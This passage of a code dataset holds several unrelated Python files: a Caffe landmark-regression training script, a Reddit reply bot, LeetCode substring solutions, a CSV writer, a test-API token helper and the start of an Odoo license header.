if test_net_path is not None:\r\n s.test_net.append(test_net_path)\r\n s.test_interval = 1000 # Test after every 1000 training iterations.\r\n s.test_iter.append(100) # Test on 100 batches each time we test.\r\n\r\n # The number of iterations over which to average the gradient.\r\n # Effectively boosts the training batch size by the given factor, without\r\n # affecting memory utilization.\r\n s.iter_size = 1\r\n \r\n s.max_iter = 100000 # # of times to update the net (training iterations)\r\n \r\n # Solve using the stochastic gradient descent (SGD) algorithm.\r\n # Other choices include 'Adam' and 'RMSProp'.\r\n s.type = 'SGD'\r\n\r\n # Set the initial learning rate for SGD.\r\n s.base_lr = base_lr\r\n\r\n # Set `lr_policy` to define how the learning rate changes during training.\r\n # Here, we 'step' the learning rate by multiplying it by a factor `gamma`\r\n # every `stepsize` iterations.\r\n s.lr_policy = 'step'\r\n s.gamma = 0.1\r\n s.stepsize = 5000\r\n\r\n # Set other SGD hyperparameters. Setting a non-zero `momentum` takes a\r\n # weighted average of the current gradient and previous gradients to make\r\n # learning more stable. 
L2 weight decay regularizes learning, to help prevent\r\n # the model from overfitting.\r\n s.momentum = 0.9\r\n s.weight_decay = 5e-4\r\n\r\n # Display the current training loss and accuracy every 1000 iterations.\r\n s.display = 100\r\n\r\n # Snapshots are files used to store networks we've trained. Here, we'll\r\n # snapshot every 10K iterations -- ten times during training.\r\n s.snapshot = 10000\r\n s.snapshot_prefix = 'test_snapshot'\r\n \r\n # Train on the GPU. Using the CPU to train large networks is very slow.\r\n s.solver_mode = caffe_pb2.SolverParameter.GPU\r\n \r\n return s\r\ndef anno_net(train,batch_size=128,data=None):\r\n \r\n n = caffe.NetSpec()\r\n \r\n if train:\r\n n.data, n.label = L.HDF5Data(source='train_h5_list.txt', batch_size=batch_size, ntop=2) \r\n else:\r\n n.data = data\r\n \r\n \r\n n.conv1_1 = L.Convolution(n.data, kernel_size=3,pad=1,num_output=32,\\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n n.relu1_1 = L.ReLU(n.conv1_1, in_place=True)\r\n\r\n n.conv1_2 = L.Convolution(n.conv1_1, kernel_size=3,pad=1,num_output=32,\\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n n.relu1_2 = L.ReLU(n.conv1_2, in_place=True)\r\n\r\n n.pool1 = L.Pooling(n.relu1_2, kernel_size=2,stride=2, pool=P.Pooling.MAX)\r\n # n.dropout1 = L.Dropout(n.pool1, in_place=True,dropout_ratio = 0.1)\r\n\r\n n.conv2_1 = L.Convolution(n.pool1, kernel_size=3,pad=1,num_output=64,\\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n n.relu2_1 = L.ReLU(n.conv2_1, in_place=True)\r\n\r\n n.pool2 = L.Pooling(n.relu2_1, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n # n.dropout2 = L.Dropout(n.pool2, in_place=True,dropout_ratio = 0.2)\r\n\r\n n.conv3_1 = L.Convolution(n.pool2, kernel_size=3,pad=1,num_output=128,\\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n n.relu3_1 = L.ReLU(n.conv3_1,in_place=True)\r\n\r\n n.pool3 = L.Pooling(n.relu3_1, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n # n.dropout3 = L.Dropout(n.pool3, in_place=True,dropout_ratio = 0.3)\r\n \r\n n.Flat=L.Flatten(n.pool3)\r\n\r\n n.fc6= L.InnerProduct(n.Flat, num_output=1024, \\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n n.relu6 = L.ReLU(n.fc6, in_place=True)\r\n n.dropout4 = L.Dropout(n.relu6, in_place=True,dropout_ratio = 0.3)\r\n \r\n n.fc7= L.InnerProduct(n.dropout4, num_output=1024, \\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n n.relu7 = L.ReLU(n.fc7, in_place=True)\r\n \r\n n.fc8= L.InnerProduct(n.fc7, num_output=110, \\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n\r\n # n.conv1_1 = L.Convolution(n.data, kernel_size=3,pad=1,num_output=64,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu1_1 
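With lr_policy='step', Caffe scales the learning rate as base_lr * gamma^floor(iter/stepsize). A two-line check of what the solver settings above (base_lr=0.001, gamma=0.1, stepsize=5000) produce:

def step_lr(it, base_lr=0.001, gamma=0.1, stepsize=5000):
    # Caffe 'step' policy: lr = base_lr * gamma ** floor(iter / stepsize)
    return base_lr * gamma ** (it // stepsize)

assert step_lr(0) == 0.001
assert abs(step_lr(5000) - 0.0001) < 1e-12   # dropped 10x at the first step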
= L.ReLU(n.conv1_1, in_place=True)\r\n\r\n # n.conv1_2 = L.Convolution(n.relu1_1, kernel_size=3,pad=1,num_output=64,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu1_2 = L.ReLU(n.conv1_2, in_place=True)\r\n\r\n # n.pool1 = L.Pooling(n.relu1_2, kernel_size=2,stride=2, pool=P.Pooling.MAX)\r\n\r\n # n.conv2_1 = L.Convolution(n.pool1, kernel_size=3,pad=1,num_output=128,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu2_1 = L.ReLU(n.conv2_1, in_place=True)\r\n\r\n # n.conv2_2 = L.Convolution(n.conv2_1, kernel_size=3,pad=1,num_output=128,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu2_2 = L.ReLU(n.conv2_2, in_place=True)\r\n\r\n # n.pool2 = L.Pooling(n.relu2_2, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n\r\n # n.conv3_1 = L.Convolution(n.pool2, kernel_size=3,pad=1,num_output=256,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu3_1 = L.ReLU(n.conv3_1,in_place=True)\r\n\r\n # n.conv3_2 = L.Convolution(n.conv3_1, kernel_size=3,pad=1,num_output=256,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu3_2 = L.ReLU(n.conv3_2, in_place=True)\r\n\r\n # n.conv3_3 = L.Convolution(n.relu3_2, kernel_size=3,pad=1,num_output=256,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu3_3 = L.ReLU(n.conv3_3, in_place=True)\r\n\r\n # n.pool3 = L.Pooling(n.relu3_3, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n\r\n # n.conv4_1 = L.Convolution(n.pool3, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu4_1 = L.ReLU(n.conv4_1, in_place=True)\r\n\r\n # n.conv4_2 = L.Convolution(n.relu4_1, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu4_2 = L.ReLU(n.conv4_2, in_place=True)\r\n\r\n # n.conv4_3 = L.Convolution(n.relu4_2, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu4_3 = L.ReLU(n.conv4_3, in_place=True)\r\n\r\n # n.pool4 = L.Pooling(n.relu4_3, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n\r\n # n.conv5_1 = L.Convolution(n.pool4, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu5_1 = L.ReLU(n.conv5_1, in_place=True)\r\n\r\n # n.conv5_2 = L.Convolution(n.relu5_1, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # 
weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu5_2 = L.ReLU(n.conv5_2, in_place=True)\r\n\r\n # n.conv5_3 = L.Convolution(n.relu5_2, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu5_3 = L.ReLU(n.conv5_3, in_place=True)\r\n\r\n # n.pool5 = L.Pooling(n.relu5_3, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n\r\n # n.fc6= L.Convolution(n.pool5, kernel_size=3, pad=3,dilation=3,num_output=1024, \\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n # n.relu6 = L.ReLU(n.fc6, in_place=True)\r\n # n.dropout6 = L.Dropout(n.relu6, in_place=True)\r\n \r\n # n.fc7= L.Convolution(n.dropout6, kernel_size=3, pad=3,dilation=3,num_output=1024, \\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n # n.relu7 = L.ReLU(n.fc7, in_place=True)\r\n # n.dropout7 = L.Dropout(n.relu7, in_place=True)\r\n \r\n # n.fc8= L.Convolution(n.dropout7, kernel_h=3,kernel_w=3, num_output=110, \\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n\r\n\r\n if train:\r\n n.loss =L.EuclideanLoss(n.fc8, n.label)\r\n # n.acc=L.EuclideanLoss(n.fc8, n.label)\r\n return n.to_proto()\r\n\r\n\r\n\r\ndef train(niter=10000):\r\n with open('train.prototxt', 'w') as f:\r\n f.write(str(anno_net(train=True)))\r\n\r\n with open('solver.prototxt', 'w') as f:\r\n f.write(str(solver('train.prototxt')))\r\n\r\n niter=10000\r\n print ('Running solvers for %d iterations...' % niter)\r\n solvers =caffe.get_solver('solver.prototxt') # directly read from the data\r\n loss, weights = run_solvers(niter, solvers)\r\n print ('Done.')\r\n\r\n # Delete solvers to save memory.\r\n del solvers\r\n\r\n #train show\r\n plt.figure()\r\n plot(list(loss[int(i)-1] for i in np.linspace(1,len(loss),len(loss)/100)))\r\n xlabel('Iteration #')\r\n ylabel('Loss')\r\n plt.show()\r\n\r\n return loss, weights\r\n\r\ndef commander_input(argv):\r\n #for input\r\n inputfile=''\r\n mode=''\r\n try:\r\n opts, args = getopt.getopt(argv,\"hi:m:\",[\"ifile=\",\"mode=\"])\r\n except getopt.GetoptError:\r\n print('Lpython anno_test.py -i -m ')\r\n sys.exit(2)\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n print('Lpython anno_test.py -i -m ')\r\n sys.exit()\r\n elif opt in (\"-i\", \"--ifile\"):\r\n inputfile = arg\r\n elif opt in (\"-m\", \"--mode\"):\r\n mode = arg\r\n\r\n if not inputfile or int(inputfile)<1 or int(inputfile)>605:\r\n print('Failure. Input the file_number first!')\r\n sys.exit(2)\r\n else:\r\n inputfile = 'out/'+inputfile+'.png'\r\n \r\n if not mode or mode=='False':\r\n Train_flag=False\r\n print('Mode: Test')\r\n elif mode=='True':\r\n Train_flag=True\r\n print('Mode: Train')\r\n else:\r\n print('Failure. 
Mode should be \"False\" or \"True\"')\r\n\r\n return Train_flag, inputfile\r\n\r\ndef main(argv):\r\n \r\n Train_flag,inputfile=commander_input(argv)\r\n\r\n if Train_flag:\r\n # train or not\r\n loss, weights=train(10000)\r\n \r\n\r\n # delete the contents\r\n with open('Result.txt', \"r+\") as f:\r\n f.seek(0)\r\n f.truncate() \r\n f.close()\r\n\r\n test_path='crop_test.txt'\r\n with open(test_path, 'r' ) as T :\r\n lines = T.readlines()\r\n \r\n\r\n GOOD=0 # number of the good ones(<0.35)\r\n NUMBER=0 # number of the ones being tested\r\n for i,l in enumerate(lines):\r\n loss_new=0\r\n sp = l.split(' ')\r\n # if sp[0]==imgpath:\r\n \r\n imgpath=sp[0]\r\n img_src = cv2.imread(imgpath)\r\n\r\n img=img_src # copy\r\n \r\n img = img.astype(float)\r\n\r\n h,w,_=img_src.shape #(y,x,channel)\r\n dummy_data = L.DummyData(shape=dict(dim=[1, 3, 96, 96]))\r\n with open('deploy.prototxt', 'w') as f:\r\n f.write(str(anno_net(train=False,data=dummy_data)))\r\n\r\n if not Train_flag:\r\n weights = 'weights.caffemodel'\r\n deploy_net = caffe.Net('deploy.prototxt', weights, caffe.TEST)\r\n \r\n im_data = cv2.resize(img, (96,96))\r\n # mean=np.array([85.19454521, 100.91133012, 130.16421912])\r\n mean=np.array([85.18678326,100.91105471,130.16646401 ])\r\n # mean=np.array([84.3265 101.5739 136.35704451])\r\n im_data-=mean \r\n im_data = im_data*0.00390625 # [0,255] -> [0,1]\r\n im_data=im_data.transpose(2,0,1) #HWC->CHW\r\n im_data = np.array([im_data], dtype = np.float)\r\n deploy_net.blobs['data'].data[...] = im_data\r\n output=deploy_net.forward(start='conv1_1')['fc8']\r\n\r\n # #draw predicted points\r\n label=np.zeros(110)\r\n for j in range(110):\r\n if (j+1)%2: #x\r\n label[j],label[j+1]= output[0,j]*w,output[0,j+1]*h\r\n loss_new+=math.pow((float(sp[j+1])-label[j]),2)\r\n \r\n loss_new=math.sqrt(loss_new)/w\r\n\r\n temp=sp[0]+' '+str(round(loss_new,3))\r\n\r\n if loss_new<=0.35:\r\n temp+=' Good!\\n'\r\n GOOD+=1\r\n else:\r\n temp+='\\n'\r\n NUMBER+=1\r\n with open('Result.txt', 'a+' ) as P :\r\n P.write(temp)\r\n P.close()\r\n \r\n\r\n print('Ratio: %f'%(GOOD/NUMBER)) \r\n\r\n\r\n\r\n\r\n # imgpath=inputfile\r\n # img_src = cv2.imread(imgpath)\r\n\r\n # img=img_src # copy\r\n \r\n # img = img.astype(float)\r\n\r\n # h,w,_=img_src.shape #(y,x,channel)\r\n # dummy_data = L.DummyData(shape=dict(dim=[1, 3, 96, 96]))\r\n # with open('deploy.prototxt', 'w') as f:\r\n # f.write(str(anno_net(train=False,data=dummy_data)))\r\n\r\n # if not Train_flag:\r\n # weights = 'weights.caffemodel'\r\n # deploy_net = caffe.Net('deploy.prototxt', weights, caffe.TEST)\r\n \r\n # im_data = cv2.resize(img, (96,96))\r\n # # mean=np.array([85.19454521, 100.91133012, 130.16421912])\r\n # mean=np.array([85.18678326,100.91105471,130.16646401 ])\r\n # # mean=np.array([84.3265 101.5739 136.35704451])\r\n # im_data-=mean \r\n # im_data = im_data*0.00390625 # [0,255] -> [0,1]\r\n # im_data=im_data.transpose(2,0,1) #HWC->CHW\r\n # im_data = np.array([im_data], dtype = np.float)\r\n # deploy_net.blobs['data'].data[...] 
= im_data\r\n # output=deploy_net.forward(start='conv1_1')['fc8']\r\n\r\n\r\n # #draw predicted points\r\n # label=np.zeros(110)\r\n # for j in range(110):\r\n # if (j+1)%2: #x\r\n # label[j],label[j+1]= output[0,j]*w,output[0,j+1]*h\r\n # print(label[j],label[j+1])\r\n # cv2.circle(img_src,(int(label[j]),int(label[j+1])),1,(255,0,0),1)\r\n\r\n # print('\\n\\n')\r\n # #draw original ones, for comparison\r\n # test_path='whole.txt'\r\n # with open(test_path, 'r' ) as T :\r\n # lines = T.readlines()\r\n # loss_new=0\r\n # for i,l in enumerate(lines):\r\n # sp = l.split(' ')\r\n # if sp[0]==imgpath:\r\n # for j in range(110):\r\n # loss_new+=math.pow((float(sp[j+1])-label[j]),2)\r\n # if (j+1)%2:\r\n # print(sp[j+1],sp[j+2])\r\n # cv2.circle(img_src,(int(sp[j+1]),int(sp[j+2])),1,(0,0,255),1)\r\n # break\r\n\r\n \r\n # loss_new=math.sqrt(loss_new)/w\r\n # print('\\nLOSS: %f'%loss_new) \r\n\r\n \r\n # cv2.imshow(\"ear2\", img_src) \r\n # ch = cv2.waitKey(0) & 0xFF\r\n # if ch == 27:\r\n # os.exit()\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])\r\n","sub_path":"anno_test.py","file_name":"anno_test.py","file_ext":"py","file_size_in_byte":17358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"550605804","text":"import praw # The Reddit API\n# Necessary exceptions to catch\nfrom prawcore.exceptions import OAuthException, ResponseException\n# To truncate messages (optional really)\nfrom wolfinaboxutils.formatting import truncate\nimport time # To sleep\nimport json # Save/Load config\nimport logging # For logging... of course\nimport sys # For various things\n# Configure the logger\nlogger = logging.getLogger('redditbot')\nlogger.addHandler(logging.FileHandler(f'{__name__}.log'))\nlogger.addHandler(logging.StreamHandler(sys.stdout))\nlogger.setLevel(logging.DEBUG)\n\n#GLOBALS===========================#\nconfig = {}\ndefault_config = {'owner': 'owner_username_here', 'username': 'bot_username_here', 'password': 'bot_password_here',\n 'client_id': 'bot_client_id_here', 'client_secret': 'bot_client_secret_here', 'user_agent': 'descriptive bot message here',\n 'subreddits': [], 'unsubscribed_users': []}\n#==================================#\n#Functions=========================#\n\n\ndef save():\n \"\"\"\n Save the config to file\n \"\"\"\n # Open \"config.json\" and dump the config to it\n with open('config.json', 'w') as f:\n json.dump(config, f, indent=4, separators=(',', ': '))\n\n\ndef footer_message(bot: praw.Reddit):\n \"\"\"\n Returns the constructed footer message.\\n\n `bot` The currently running bot.\n \"\"\"\n # This can be customised to whatever you like. You can use Reddit markdown formatting as well.\n return f'\\n\\n___\\n\\n*^I ^am ^a ^bot. ^Message ^u/{config[\"owner\"]} ^if ^I ^am ^being ^stupid. 
^[Unsubscribe](https://www.reddit.com/message/compose/?to={str(bot.user.me())}&subject=unsubscribe&message=unsubscribe)*'\n\n\ndef login():\n # Try loading the config and logging in\n try:\n global config\n with open('config.json', 'r') as f:\n config = json.load(f)\n # This block creates the Reddit api connection.\n r = praw.Reddit(username=config['username'], password=config['password'],\n client_id=config['client_id'], client_secret=config['client_secret'],\n user_agent=config['user_agent'])\n\n # Check credentials (if we can get \"me\", we're logged in!)\n r.user.me()\n return r\n # Config file doesn't exist\n except FileNotFoundError:\n logger.warn(\n 'Couldn\\'t find \"config.json\", creating...\\nPlease edit \"config.json\" and fill in the variables with your information.')\n with open('config.json', 'w') as f:\n json.dump(default_config, f, indent=4, separators=(',', ': '))\n # Couldn't log in to Reddit (probably wrong credentials)\n except (OAuthException, ResponseException) as e:\n logger.error(\n 'Invalid credentials.\\nPlease check that the credentials in \"config.json\" are correct.\\n('+str(e)+')')\n input('Press return to exit...')\n exit(0)\n\n\ndef handle_comments(bot: praw.Reddit, max_comments: int = 25):\n \"\"\"\n Handle comments\\n\n `bot` The currently running bot\\n\n `max_comments` How many comments to search through (for each sub)\n \"\"\"\n # For every subreddit bot should comment on\n for subreddit in config['subreddits']:\n # For every comment in that subreddit\n for comment in bot.subreddit(subreddit).comments(limit=max_comments):\n # Don't reply to ourself\n if comment.author == bot.user.me():\n continue\n # Don't reply to unsubscribed users\n if comment.author in config['unsubscribed_users']:\n continue\n # Get Replies (this needs to be done, otherwise replies are not requested)\n comment.refresh()\n # Don't reply to the same post more than once\n if bot.user.me() in [comment.author for comment in comment.replies]:\n continue\n\n # Start Matching Text\n # EXAMPLE: This will match the word 'test' in a comment (.lower() so TEST or tEsT is also matched)\n if 'test' in comment.body.lower():\n logger.info('Found matching comment \"'+comment.id+'\" in subreddit \"' +\n subreddit+'\"\\n\\t\"'+truncate(comment.body, 70, '...')+'\"')\n # This is how you reply\n comment.reply(f'I found this comment!{footer_message(bot)}')\n\n\ndef handle_messages(bot: praw.Reddit, max_messages: int = 25):\n \"\"\"\n Handle messages to the bot\\n\n `bot` The currently running bot\n `max_messages` How many messages to search through\n \"\"\"\n # Get the messages\n messages = list(bot.inbox.messages(limit=max_messages))\n # If we have no messages, quit\n if len(messages) == 0:\n return\n # Print how many messages we have\n logger.info('Messages ('+str(len(messages))+'):')\n # Iterate through every message\n for message in messages:\n logger.info('Sender: '+(str(message.author)\n if message.author else 'Reddit'))\n logger.info('\\t\"'+truncate(message.body, 70, '...')+'\"')\n\n # This is where you can handle different text in the messages.\n # Unsubscribe user\n if 'unsubscribe' in message.subject.lower() or 'unsubscribe' in message.body.lower():\n logger.info(f'Unsubscribing \"{message.author}\"')\n config['unsubscribed_users'].append(str(message.author))\n save()\n message.reply(\n f'Okay, I will no longer reply to your posts.{footer_message(bot)}')\n message.delete()\n # Ignore the message if we don't recognise it\n else:\n message.delete()\n\n\ndef run_bot(bot: praw.Reddit, sleep_time: 
int = 10):\n    handle_comments(bot)\n    handle_messages(bot)\n    # Sleep, to not flood\n    logger.debug('Sleeping '+str(sleep_time)+' seconds...')\n    time.sleep(sleep_time)\n#==================================#\n\n\n#Main Code=========================#\nif __name__ == '__main__':\n    logger.info('Logging in...')\n    bot = login()\n\n    logger.info('Logged in as '+str(bot.user.me()))\n    logger.info('Active in '+str(len(config['subreddits']))+' subreddit'+('s' if len(config['subreddits']) != 1 else '')+': ' +\n                (', '.join([sub for sub in config['subreddits']])))\n    logger.info(str(len(config['unsubscribed_users']))+' unsubscribed user' +\n                ('s' if len(config['unsubscribed_users']) != 1 else ''))\n\n    while True:\n        run_bot(bot)\n#==================================#\n","sub_path":"prawbot.py","file_name":"prawbot.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"259276619","text":"\"\"\"\n1163. Last Substring in Lexicographical Order\nGiven a string s, return the last substring of s in lexicographical order.\n\n \n\nExample 1:\n\nInput: \"abab\"\nOutput: \"bab\"\nExplanation: The substrings are [\"a\", \"ab\", \"aba\", \"abab\", \"b\", \"ba\", \"bab\"]. The lexicographically maximum substring is \"bab\".\nExample 2:\n\nInput: \"leetcode\"\nOutput: \"tcode\"\n \n\nNote:\n\n1 <= s.length <= 4 * 10^5\ns contains only lowercase English letters.\n\"\"\"\nimport collections\n\n\n# big lao solution\n# Runtime: 148 ms, faster than 99.37% of Python3 online submissions for Last Substring in Lexicographical Order.\n# Memory Usage: 20.1 MB, less than 100.00% of Python3 online submissions for Last Substring in Lexicographical Order.\nclass Solution:\n    def lastSubstring(self, s: str) -> str:\n        n = len(s)\n        max_indices = []\n        max_char = max(set(s))\n        consecutive = False\n        # Candidate start positions: the first index of each run of the maximum character.\n        for idx, char in enumerate(s):\n            if char == max_char:\n                if not consecutive:\n                    max_indices.append(idx)\n                    consecutive = True\n            else:\n                consecutive = False\n\n        # Compare the surviving candidates one extra character at a time.\n        increment = 1\n        while len(max_indices) > 1:\n            new_indices = []\n            base_char = \"\"\n            for idx in max_indices:\n                if idx + increment < n:\n                    new_char = s[idx+increment]\n                else:\n                    new_char = \"\"\n                if new_char > base_char:\n                    new_indices = [idx]\n                    base_char = new_char\n                elif new_char == base_char:\n                    new_indices.append(idx)\n            max_indices = new_indices.copy()\n            increment += 1\n        return s[max_indices[0]:]\n\n\n# brute force\n# Runtime: 2416 ms, faster than 25.05% of Python3 online submissions for Last Substring in Lexicographical Order.\n# Memory Usage: 33.9 MB, less than 100.00% of Python3 online submissions for Last Substring in Lexicographical Order.\nclass Solution:\n    def lastSubstring(self, s: str) -> str:\n        n = len(s)\n        sub_str = collections.defaultdict(list)\n        for idx, char in enumerate(s):\n            sub_str[char].append(idx)\n        max_key = sorted(sub_str.keys())[-1]\n        res = \"\"\n        for idx in sub_str[max_key]:\n            tmp_str = s[idx:]\n            if tmp_str > res:\n                res = tmp_str\n        return res\n","sub_path":"Widen/LC1163_Last_Substring_in_Lexicographical_Order.py","file_name":"LC1163_Last_Substring_in_Lexicographical_Order.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"384526788","text":"import csv\n\ncsvfile = \"data.csv\"\n\n#Assuming res is a flat list\n\"\"\"\nwith open(csvfile, \"w\") as output:\n    writer = csv.writer(output, lineterminator='\\n')\n    for val in res:\n        writer.writerow([val]) \n\"\"\"\n#Assuming res is a list of lists\ndef 
writeCSVFile(res):\n\tcsvfile = \"dataSurvey.csv\"\n\twith open(csvfile, \"w\") as output:\n\t writer = csv.writer(output, lineterminator='\\n')\n\t writer.writerows(res)\n\n","sub_path":"app/writeCSV.py","file_name":"writeCSV.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"165563322","text":"#传入参数telephone,根据传入参数查找tocken,如果没有找到则登录生成并写入文件\n#取文件中tocken使用,测试请求,如果请求成功则返回tocken。如果请求报错(tocken错误)则重新登录生成tocken 并更新文件内容\n\nimport base64\nfrom common import http_requests,read_txt\n\nfrom conf import project_path\n\nclass ForTocken():\n def __init__(self,telephone):\n self.telephone=telephone\n\n def again_log(self):\n url = 'https://new-test-ck.haochang.tv/api/captcha/telphone'\n param = {'telphone': self.telephone}\n headers = {'x-api-test': 'true'}\n http_requests.RequestsClass(url=url, param=param, headers=headers).http_requests(method='get')\n url = 'https://new-test-ck.haochang.tv/api/login/telphone'\n param = {'telphone': self.telephone, 'captcha': '1234'}\n req_data = http_requests.RequestsClass(url=url, param=param, headers=headers).http_requests(method='post')\n tocken = req_data.json()['authorizeToken']\n roomid = req_data.json()['data']['room']['roomId']\n userid=req_data.json()['data']['user']['userId']\n return [tocken,roomid,userid]\n\n def toc_base(self,tocken):\n tocken= str(base64.b64encode(bytes(tocken, encoding = \"utf8\")), encoding = \"utf-8\")\n return tocken\n\n def return_tocken(self):\n data=eval(read_txt.DoTxt(project_path.log_data).read_txt())\n if self.telephone in data.keys():\n headers = {'x-api-test': 'true','authorize-token': self.toc_base(data[self.telephone][0])}\n url='https://new-test-ck.haochang.tv/api/accompany/db'\n req_data = http_requests.RequestsClass(url=url, param={}, headers=headers).http_requests(method='get')\n if req_data.json()['errno'] =='0':\n tocken = self.toc_base(data[self.telephone][0])\n roomid = data[self.telephone][1]\n userid = data[self.telephone][2]\n elif req_data.json()['errno'] == '100002':\n log_in=self.again_log()\n tocken = self.toc_base(log_in[0])\n userid = log_in[2]\n roomid = log_in[1]\n data[self.telephone] = log_in\n read_txt.DoTxt(project_path.log_data).write_txt(str(data))\n else:\n print('接口报错了')\n else:\n re_tocken=self.again_log()\n tocken=self.toc_base(re_tocken[0])\n roomid = re_tocken[1]\n userid = re_tocken[2]\n data[self.telephone]=re_tocken\n read_txt.DoTxt(project_path.log_data).write_txt(str(data))\n return [tocken,roomid,userid]\n\n\nif __name__ == '__main__':\n a= ForTocken('18600000001').return_tocken()\n print (a)","sub_path":"common/for_api_tocken.py","file_name":"for_api_tocken.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"368593964","text":"# -*- encoding: utf-8 -*-\n###############################################################################\n# #\n# Copyright (C) 2014 KMEE (http://www.kmee.com.br) #\n# @author Rafael da Silva Lima #\n# Matheus Lima Felix #\n# #\n#This program is free software: you can redistribute it and/or modify #\n#it under the terms of the GNU Affero General Public License as published by #\n#the Free Software Foundation, either version 3 of the License, or #\n#(at your option) any later version. 
